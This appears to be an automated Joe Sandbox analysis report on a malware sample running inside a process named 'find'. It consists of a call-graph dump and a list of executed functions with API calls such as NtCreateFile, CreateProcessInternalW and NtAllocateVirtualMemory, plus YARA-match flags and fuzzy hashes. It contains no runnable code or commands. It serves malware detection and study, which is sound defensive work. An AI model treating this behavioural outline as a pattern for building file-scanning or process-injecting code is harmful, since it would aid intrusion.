6e81df 100528->100530 100535 6d1ee0 100528->100535 100530->100501 100531->100512 100533 6e997a 100532->100533 100534 6e9988 RtlAllocateHeap 100533->100534 100534->100526 100551 6d8330 100535->100551 100537 6d2463 100537->100530 100538 6d1f00 100538->100537 100555 6e1350 100538->100555 100541 6d2114 100563 6ec8c0 100541->100563 100542 6d1f5e 100542->100537 100558 6ec790 100542->100558 100545 6d2129 100547 6d217c 100545->100547 100569 6d09e0 100545->100569 100547->100537 100548 6d09e0 LdrInitializeThunk 100547->100548 100573 6d82d0 100547->100573 100548->100547 100549 6d22d3 100549->100547 100550 6d82d0 LdrInitializeThunk 100549->100550 100550->100549 100552 6d833d 100551->100552 100553 6d835e SetErrorMode 100552->100553 100554 6d8365 100552->100554 100553->100554 100554->100538 100577 6eb670 100555->100577 100557 6e1371 100557->100542 100559 6ec7a6 100558->100559 100560 6ec7a0 100558->100560 100561 6eb7d0 RtlAllocateHeap 100559->100561 100560->100541 100562 6ec7cc 100561->100562 100562->100541 100564 6ec830 100563->100564 100565 6eb7d0 RtlAllocateHeap 100564->100565 100566 6ec88d 100564->100566 100567 6ec86a 100565->100567 100566->100545 100568 6eb6f0 RtlFreeHeap 100567->100568 100568->100566 100570 6d09f9 100569->100570 100584 6e98d0 100570->100584 100574 6d82e3 100573->100574 100589 6e8c10 100574->100589 100576 6d830e 100576->100547 100580 6e97b0 100577->100580 100579 6eb69e 100579->100557 100581 6e9845 100580->100581 100583 6e97db 100580->100583 100582 6e9858 NtAllocateVirtualMemory 100581->100582 100582->100579 100583->100579 100585 6e98ea 100584->100585 100588 2f52c70 LdrInitializeThunk 100585->100588 100586 6d09ff 100586->100549 100588->100586 100590 6e8c8b 100589->100590 100591 6e8c38 100589->100591 100594 2f52dd0 LdrInitializeThunk 100590->100594 100591->100576 100592 6e8cad 100592->100576 100594->100592 100595 6d74f0 100596 6d7562 100595->100596 100597 6d7508 100595->100597 100597->100596 100599 6db450 100597->100599 100600 6db476 100599->100600 100601 6db6af 100600->100601 100626 6e9a30 100600->100626 100601->100596 100603 6db4f2 100603->100601 100604 6ec8c0 2 API calls 100603->100604 100605 6db511 100604->100605 100605->100601 100606 6db5e8 100605->100606 100607 6e8d10 LdrInitializeThunk 100605->100607 100608 6d5d10 LdrInitializeThunk 100606->100608 100610 6db607 100606->100610 100609 6db573 100607->100609 100608->100610 100609->100606 100614 6db57c 100609->100614 100613 6db697 100610->100613 100632 6e8880 100610->100632 100611 6db5d0 100612 6d82d0 LdrInitializeThunk 100611->100612 100618 6db5de 100612->100618 100617 6d82d0 LdrInitializeThunk 100613->100617 100614->100601 100614->100611 100615 6db5ae 100614->100615 100629 6d5d10 100614->100629 100647 6e49b0 LdrInitializeThunk 100615->100647 100621 6db6a5 100617->100621 100618->100596 100621->100596 100622 6db66e 100637 6e8930 100622->100637 100624 6db688 100642 6e8a90 100624->100642 100627 6e9a4a 100626->100627 100628 6e9a5b CreateProcessInternalW 100627->100628 100628->100603 100648 6e8ee0 100629->100648 100631 6d5d4e 100631->100615 100633 6e88fa 100632->100633 100634 6e88a8 100632->100634 100654 2f539b0 LdrInitializeThunk 100633->100654 100634->100622 100635 6e891c 100635->100622 100638 6e89ad 100637->100638 100639 6e895b 100637->100639 100655 2f54340 LdrInitializeThunk 100638->100655 100639->100624 100640 6e89cf 100640->100624 100643 6e8abb 100642->100643 100644 6e8b0d 100642->100644 100643->100613 100656 2f52fb0 LdrInitializeThunk 100644->100656 100645 6e8b2f 100645->100613 100647->100611 100649 6e8f8e 100648->100649 100651 6e8f0c 100648->100651 100653 2f52d10 LdrInitializeThunk 100649->100653 100650 6e8fd0 100650->100631 100651->100631 100653->100650 100654->100635 100655->100640 100656->100645 100657 6d6f70 100658 6d6f9a 100657->100658 100661 6d8100 100658->100661 100660 6d6fc1 100662 6d811d 100661->100662 100668 6e8e00 100662->100668 100664 6d816d 100665 6d8174 100664->100665 100666 6e8ee0 LdrInitializeThunk 100664->100666 100665->100660 100667 6d819d 100666->100667 100667->100660 100669 6e8e98 100668->100669 100670 6e8e28 100668->100670 100673 2f52f30 LdrInitializeThunk 100669->100673 100670->100664 100671 6e8ece 100671->100664 100673->100671 100835 6daf30 100840 6dac40 100835->100840 100837 6daf3d 100854 6da8b0 100837->100854 100839 6daf53 100841 6dac65 100840->100841 100865 6d8540 100841->100865 100844 6dadb0 100844->100837 100846 6dadbe 100847 6dadc7 100846->100847 100849 6daeb5 100846->100849 100884 6da300 100846->100884 100847->100837 100851 6daf1a 100849->100851 100893 6da670 100849->100893 100852 6eb6f0 RtlFreeHeap 100851->100852 100853 6daf21 100852->100853 100853->100837 100855 6da8c6 100854->100855 100858 6da8d1 100854->100858 100856 6eb7d0 RtlAllocateHeap 100855->100856 100856->100858 100857 6da8f5 100857->100839 100858->100857 100859 6d8540 GetFileAttributesW 100858->100859 100860 6dac12 100858->100860 100863 6da300 RtlFreeHeap 100858->100863 100864 6da670 RtlFreeHeap 100858->100864 100859->100858 100861 6dac2b 100860->100861 100862 6eb6f0 RtlFreeHeap 100860->100862 100861->100839 100862->100861 100863->100858 100864->100858 100866 6d8561 100865->100866 100867 6d8573 100866->100867 100868 6d8568 GetFileAttributesW 100866->100868 100867->100844 100869 6e3570 100867->100869 100868->100867 100870 6e357e 100869->100870 100871 6e3585 100869->100871 100870->100846 100872 6d4730 LdrLoadDll 100871->100872 100873 6e35ba 100872->100873 100874 6e35c9 100873->100874 100897 6e3030 LdrLoadDll 100873->100897 100876 6eb7d0 RtlAllocateHeap 100874->100876 100880 6e3774 100874->100880 100877 6e35e2 100876->100877 100878 6e376a 100877->100878 100877->100880 100881 6e35fe 100877->100881 100879 6eb6f0 RtlFreeHeap 100878->100879 100878->100880 100879->100880 100880->100846 100881->100880 100882 6eb6f0 RtlFreeHeap 100881->100882 100883 6e375e 100882->100883 100883->100846 100885 6da326 100884->100885 100898 6ddd40 100885->100898 100887 6da398 100889 6da520 100887->100889 100890 6da3b6 100887->100890 100888 6da505 100888->100846 100889->100888 100891 6da1c0 RtlFreeHeap 100889->100891 100890->100888 100903 6da1c0 100890->100903 100891->100889 100894 6da696 100893->100894 100895 6ddd40 RtlFreeHeap 100894->100895 100896 6da71d 100895->100896 100896->100849 100897->100874 100900 6ddd57 100898->100900 100899 6ddd71 100899->100887 100900->100899 100901 6eb6f0 RtlFreeHeap 100900->100901 100902 6dddb4 100901->100902 100902->100887 100904 6da1dd 100903->100904 100907 6dddd0 100904->100907 100906 6da2e3 100906->100890 100908 6dddf4 100907->100908 100909 6dde9e 100908->100909 100910 6eb6f0 RtlFreeHeap 100908->100910 100909->100906 100910->100909 100679 6e9370 100680 6e9424 100679->100680 100682 6e939c 100679->100682 100681 6e9437 NtCreateFile 100680->100681 100683 6ec7f0 100684 6eb6f0 RtlFreeHeap 100683->100684 100685 6ec805 100684->100685 100686 6eb3f0 100687 6eb3fb 100686->100687 100688 6eb41a 100687->100688 100690 6e5d20 100687->100690 100691 6e5d82 100690->100691 100693 6e5d8f 100691->100693 100694 6d24e0 100691->100694 100693->100688 100695 6d2495 100694->100695 100700 6d24ef 100694->100700 100696 6d24b6 100695->100696 100697 6e8d10 LdrInitializeThunk 100695->100697 100701 6e96f0 100696->100701 100697->100696 100699 6d24cb 100699->100693 100702 6e977c 100701->100702 100704 6e9718 100701->100704 100706 2f52e80 LdrInitializeThunk 100702->100706 100703 6e97aa 100703->100699 100704->100699 100706->100703 100707 2f52ad0 LdrInitializeThunk 100708 6cb6c0 100709 6eb670 NtAllocateVirtualMemory 100708->100709 100710 6ccd31 100709->100710 100711 6dfa40 100712 6dfaa4 100711->100712 100740 6d64a0 100712->100740 100714 6dfbde 100715 6dfbd7 100715->100714 100747 6d65b0 100715->100747 100717 6dfd83 100718 6dfc5a 100718->100717 100719 6dfd92 100718->100719 100751 6df820 100718->100751 100721 6e9660 NtClose 100719->100721 100722 6dfd9c 100721->100722 100723 6dfc96 100723->100719 100724 6dfca1 100723->100724 100725 6eb7d0 RtlAllocateHeap 100724->100725 100726 6dfcca 100725->100726 100727 6dfce9 100726->100727 100728 6dfcd3 100726->100728 100760 6df710 CoInitialize 100727->100760 100729 6e9660 NtClose 100728->100729 100731 6dfcdd 100729->100731 100732 6dfcf7 100763 6e9160 100732->100763 100734 6dfd72 100735 6e9660 NtClose 100734->100735 100736 6dfd7c 100735->100736 100737 6eb6f0 RtlFreeHeap 100736->100737 100737->100717 100738 6dfd15 100738->100734 100739 6e9160 LdrInitializeThunk 100738->100739 100739->100738 100741 6d64d3 100740->100741 100742 6d64f4 100741->100742 100767 6e91f0 100741->100767 100742->100715 100744 6d6517 100744->100742 100745 6e9660 NtClose 100744->100745 100746 6d6597 100745->100746 100746->100715 100748 6d65d5 100747->100748 100772 6e9020 100748->100772 100752 6df83c 100751->100752 100753 6d4730 LdrLoadDll 100752->100753 100755 6df85a 100753->100755 100754 6df863 100754->100723 100755->100754 100756 6d4730 LdrLoadDll 100755->100756 100757 6df92e 100756->100757 100758 6d4730 LdrLoadDll 100757->100758 100759 6df988 100757->100759 100758->100759 100759->100723 100762 6df775 100760->100762 100761 6df80b CoUninitialize 100761->100732 100762->100761 100764 6e917d 100763->100764 100777 2f52ba0 LdrInitializeThunk 100764->100777 100765 6e91aa 100765->100738 100768 6e920a 100767->100768 100771 2f52ca0 LdrInitializeThunk 100768->100771 100769 6e9233 100769->100744 100771->100769 100773 6e903a 100772->100773 100776 2f52c60 LdrInitializeThunk 100773->100776 100774 6d6649 100774->100718 100776->100774 100777->100765 100783 6e95c0 100784 6e9634 100783->100784 100786 6e95e8 100783->100786 100785 6e9647 NtDeleteFile 100784->100785 100787 6e8cc0 100788 6e8cdd 100787->100788 100791 2f52df0 LdrInitializeThunk 100788->100791 100789 6e8d02 100791->100789 100792 6e0340 100793 6e035d 100792->100793 100794 6d4730 LdrLoadDll 100793->100794 100795 6e037b 100794->100795 100796 6e8b40 100797 6e8bcf 100796->100797 100798 6e8b6b 100796->100798 100801 2f52ee0 LdrInitializeThunk 100797->100801 100799 6e8bfd 100801->100799 100911 6e1980 100912 6e199c 100911->100912 100913 6e19d8 100912->100913 100914 6e19c4 100912->100914 100916 6e9660 NtClose 100913->100916 100915 6e9660 NtClose 100914->100915 100917 6e19cd 100915->100917 100918 6e19e1 100916->100918 100921 6eb810 RtlAllocateHeap 100918->100921 100920 6e19ec 100921->100920 100802 6d295f 100803 6d64a0 2 API calls 100802->100803 100804 6d297d 100803->100804 100922 6c9e10 100924 6c9e1f 100922->100924 100923 6c9e60 100924->100923 100925 6c9e4d CreateThread 100924->100925 100805 6dc7d0 100806 6dc7f9 100805->100806 100807 6dc8fd 100806->100807 100808 6dc8a3 FindFirstFileW 100806->100808 100808->100807 100811 6dc8be 100808->100811 100809 6dc8e4 FindNextFileW 100810 6dc8f6 FindClose 100809->100810 100809->100811 100810->100807 100811->100809 100926 6d7310 100927 6d732c 100926->100927 100929 6d737f 100926->100929 100928 6e9660 NtClose 100927->100928 100927->100929 100930 6d7347 100928->100930 100935 6d74b1 100929->100935 100937 6d6730 NtClose LdrInitializeThunk LdrInitializeThunk 100929->100937 100936 6d6730 NtClose LdrInitializeThunk LdrInitializeThunk 100930->100936 100932 6d7491 100932->100935 100938 6d6900 NtClose LdrInitializeThunk LdrInitializeThunk 100932->100938 100936->100929 100937->100932 100938->100935 100939 6d5d90 100940 6d82d0 LdrInitializeThunk 100939->100940 100941 6d5dc0 100940->100941 100943 6d5dec 100941->100943 100944 6d8250 100941->100944 100945 6d8294 100944->100945 100946 6d82b5 100945->100946 100951 6e89e0 100945->100951 100946->100941 100948 6d82a5 100949 6d82c1 100948->100949 100950 6e9660 NtClose 100948->100950 100949->100941 100950->100946 100952 6e8a0b 100951->100952 100953 6e8a5d 100951->100953 100952->100948 100956 2f54650 LdrInitializeThunk 100953->100956 100954 6e8a7f 100954->100948 100956->100954 100812 6e94d0 100813 6e94f8 100812->100813 100814 6e9574 100812->100814 100815 6e9587 NtReadFile 100814->100815

                                                                                  Executed Functions

                                                                                  Function 006C9E70 Relevance: 30.4, Strings: 24, Instructions: 374COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 27 6c9e70-6ca239 28 6ca243-6ca24a 27->28 29 6ca24c-6ca270 28->29 30 6ca297-6ca2b2 28->30 32 6ca281-6ca295 29->32 33 6ca272-6ca27b 29->33 31 6ca2c3-6ca2cf 30->31 34 6ca2ed 31->34 35 6ca2d1-6ca2dd 31->35 32->28 33->32 38 6ca2f4-6ca2fb 34->38 36 6ca2df-6ca2e5 35->36 37 6ca2eb 35->37 36->37 37->31 40 6ca2fd-6ca320 38->40 41 6ca322-6ca32b 38->41 40->38 42 6ca5ec-6ca5f3 41->42 43 6ca331-6ca347 41->43 44 6ca68c-6ca696 42->44 45 6ca5f9-6ca612 42->45 46 6ca358-6ca364 43->46 47 6ca6a7-6ca6b3 44->47 45->45 48 6ca614-6ca61e 45->48 49 6ca366-6ca372 46->49 50 6ca382-6ca394 46->50 55 6ca6b5-6ca6c4 47->55 56 6ca6c6-6ca6d0 47->56 57 6ca62f-6ca63b 48->57 51 6ca374-6ca37a 49->51 52 6ca380 49->52 53 6ca39a-6ca3b5 50->53 54 6ca470-6ca47a 50->54 51->52 52->46 53->53 59 6ca3b7-6ca3c1 53->59 60 6ca48b-6ca497 54->60 55->47 62 6ca63d-6ca64c 57->62 63 6ca64e-6ca655 57->63 67 6ca3d2-6ca3de 59->67 68 6ca4ad-6ca4b7 60->68 69 6ca499-6ca4ab 60->69 62->57 64 6ca687 call 6eb360 63->64 65 6ca657-6ca685 63->65 64->44 65->63 71 6ca3f4-6ca3fe 67->71 72 6ca3e0-6ca3f2 67->72 74 6ca4b9-6ca4d8 68->74 75 6ca4eb-6ca4f2 68->75 69->60 76 6ca40f-6ca41b 71->76 72->67 77 6ca4e9 74->77 78 6ca4da-6ca4e3 74->78 80 6ca529-6ca533 75->80 81 6ca4f4-6ca527 75->81 82 6ca42c-6ca436 76->82 83 6ca41d-6ca42a 76->83 77->68 78->77 84 6ca544-6ca550 80->84 81->75 87 6ca447-6ca453 82->87 83->76 85 6ca552-6ca561 84->85 86 6ca563-6ca577 84->86 85->84 90 6ca588-6ca594 86->90 91 6ca46b 87->91 92 6ca455-6ca45e 87->92 95 6ca5b6-6ca5c2 90->95 96 6ca596-6ca5a3 90->96 91->42 93 6ca469 92->93 94 6ca460-6ca466 92->94 93->87 94->93 100 6ca5c4-6ca5e5 95->100 101 6ca5e7 95->101 98 6ca5b4 96->98 99 6ca5a5-6ca5ae 96->99 98->90 99->98 100->95 101->41
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "\w$$=$(o$+$+$2$:$?H$D$DZ$T+$[$\$`$fq$g-$h$m$os$p9$v$w$|d$~v
                                                                                  • API String ID: 0-1545153448
                                                                                  • Opcode ID: bb23ba94595c2962f990ee4f79f3e4e11dbb0f0c4befc8e07cd7078e6d757f30
                                                                                  • Instruction ID: 7ff8b90d3bb68be417e1028819b017fec94193a27190711b033b8cd6aa387839
                                                                                  • Opcode Fuzzy Hash: bb23ba94595c2962f990ee4f79f3e4e11dbb0f0c4befc8e07cd7078e6d757f30
                                                                                  • Instruction Fuzzy Hash: 4B22ADB0D0526DCBEB28CF45C998BE9BBB2FB44308F1081D9C50D6B680D7B95A89DF45
                                                                                  Function 006DC7D0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 006DC8B4
                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 006DC8EF
                                                                                  • FindClose.KERNELBASE(?), ref: 006DC8FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: a9d401fa845b0ad9cfe64d9aba2512f5c7112ee372ec6229587db5e31742dadc
                                                                                  • Instruction ID: 2960cb2de9f3389f533f38c14b211cf5a05d53531355e4a07a854c8110b3d32b
                                                                                  • Opcode Fuzzy Hash: a9d401fa845b0ad9cfe64d9aba2512f5c7112ee372ec6229587db5e31742dadc
                                                                                  • Instruction Fuzzy Hash: C3318271A0034DABDB60EFA0CC85FFF777DAF44754F14445DB908A6281DA70AA84DBA4
                                                                                  Function 006E9370 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(?,?,5F042D88,?,?,?,?,?,?,?,?), ref: 006E9468
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: a7dc78b719dc9cd15489baa3544b91b2f452c5f1a3848a5b9fd1987b19d3d2d3
                                                                                  • Instruction ID: fbef38d8188671193e85315956b9c885bc70bfe8bc72c005122de57077285725
                                                                                  • Opcode Fuzzy Hash: a7dc78b719dc9cd15489baa3544b91b2f452c5f1a3848a5b9fd1987b19d3d2d3
                                                                                  • Instruction Fuzzy Hash: 9131C2B5A01649AFDB14DF99D881EEFB7F9EF88700F108219F918A7341D730A841CBA5
                                                                                  Function 006E94D0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(?,?,5F042D88,?,?,?,?,?,?), ref: 006E95B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 26da7fe65017b460ee3fec090c47ccdfb39ba2e08ec8d5d6aab7a917e6f74ca3
                                                                                  • Instruction ID: 503bb183adaed11d683b770a04e3b783e29284ab76cd9f4760ef80fa65d60b31
                                                                                  • Opcode Fuzzy Hash: 26da7fe65017b460ee3fec090c47ccdfb39ba2e08ec8d5d6aab7a917e6f74ca3
                                                                                  • Instruction Fuzzy Hash: 4031E3B5A00249AFCB14DF99C881EEFB7B9EF89710F108219F918A7341D730A951CFA5
                                                                                  Function 006E97B0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(006D1F5E,?,5F042D88,00000000,00000004,00003000,?,?,?,?,?,006E81DF,006D1F5E), ref: 006E9875
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: 087a93d75a4b84e32af9cf21d5fb0da0d0c3dfed15466f40219d2a17887fc0ff
                                                                                  • Instruction ID: 93dfab83487106b4aef9ca86925b1a519b977e60e4307e73dbfa2caab9b7d516
                                                                                  • Opcode Fuzzy Hash: 087a93d75a4b84e32af9cf21d5fb0da0d0c3dfed15466f40219d2a17887fc0ff
                                                                                  • Instruction Fuzzy Hash: 4A2108B5A01349ABDB14DF99CC41EEFB7B9EF89700F10811EF918AB241D730A911CBA5
                                                                                  Function 006E95C0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: 6e1897fa7b062e52745c58606a9da80ecf12c3e005416dadf326ea3f74b90c0c
                                                                                  • Instruction ID: e8a22d0f4b41811a0facfa69adcabc49c7f66e59fffe5f11c6f9750bc5f13321
                                                                                  • Opcode Fuzzy Hash: 6e1897fa7b062e52745c58606a9da80ecf12c3e005416dadf326ea3f74b90c0c
                                                                                  • Instruction Fuzzy Hash: 66115E716016497AD724EBA5CC42FAFB3ADDF85710F10851DF918A7282D670B9028BF5
                                                                                  Function 006E9660 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 006E9694
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                  • Instruction ID: 804fbabeaf6bdffbde1d57f4f1183e99bffa4e7093ea06ab78d5057cb27d0c50
                                                                                  • Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                  • Instruction Fuzzy Hash: 60E08C362002047BD220EB5AEC41F9B77ADEFC6794F408419FA08AB282C6B1F91187F5
                                                                                  Function 02F54340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a03e51cefe7872d3f5eb921f2fb6ca83339a97116bedd0dc2444cc379da76610
                                                                                  • Instruction ID: 7739b79ab38cc4fc1e3a5dd05478f5afb9520ec1f122ac167a8eee646d66b84f
                                                                                  • Opcode Fuzzy Hash: a03e51cefe7872d3f5eb921f2fb6ca83339a97116bedd0dc2444cc379da76610
                                                                                  • Instruction Fuzzy Hash: E8900271605800229140715888885574015D7E0381B55C015E5424554C8A158A5A5361
                                                                                  Function 02F54650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4ac95618343af3cceb3770c204df7f2430c73b371630ed1e3ee2a22fd5b321ce
                                                                                  • Instruction ID: c91c41489c6dbeb143353ce2c2b3e1379c89142a7dc2914d49c0b4b81333011b
                                                                                  • Opcode Fuzzy Hash: 4ac95618343af3cceb3770c204df7f2430c73b371630ed1e3ee2a22fd5b321ce
                                                                                  • Instruction Fuzzy Hash: FA9002A1601500524140715888084176015D7E1381395C119A5554560C861989599269
                                                                                  Function 02F52AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 40b4e426c641de10d74f2e7f8143e822a7fe089a7f20ae107f2def0b5e308659
                                                                                  • Instruction ID: 7de685362459f36af8abea0f67d18edfab4ff4c5ecd1a55534bd0166b45c483c
                                                                                  • Opcode Fuzzy Hash: 40b4e426c641de10d74f2e7f8143e822a7fe089a7f20ae107f2def0b5e308659
                                                                                  • Instruction Fuzzy Hash: E5900265221400120145B558460851B0455D7D63D1395C019F6416590CC62289695321
                                                                                  Function 02F52AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 29147128e383488fc9352995b98b5d4f5548dd0fd36450c37cba28258385d707
                                                                                  • Instruction ID: 98c28dbe82a6beec0a87781e7aec6e4828bbd8e0555aceba1882b078099c8ce5
                                                                                  • Opcode Fuzzy Hash: 29147128e383488fc9352995b98b5d4f5548dd0fd36450c37cba28258385d707
                                                                                  • Instruction Fuzzy Hash: B4900475311400130105F55C470C5170057C7D53D1355C035F7015550CD733CD755131
                                                                                  Function 02F52BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 5a29736b8b0e161cd86e0e06c55e466c5394126f1d3ddf9d5f6beeba9392775f
                                                                                  • Instruction ID: eb98cce755a9c25b058a6c3e0a00fb4ab0df1642940227a619dde7bc8ed5580f
                                                                                  • Opcode Fuzzy Hash: 5a29736b8b0e161cd86e0e06c55e466c5394126f1d3ddf9d5f6beeba9392775f
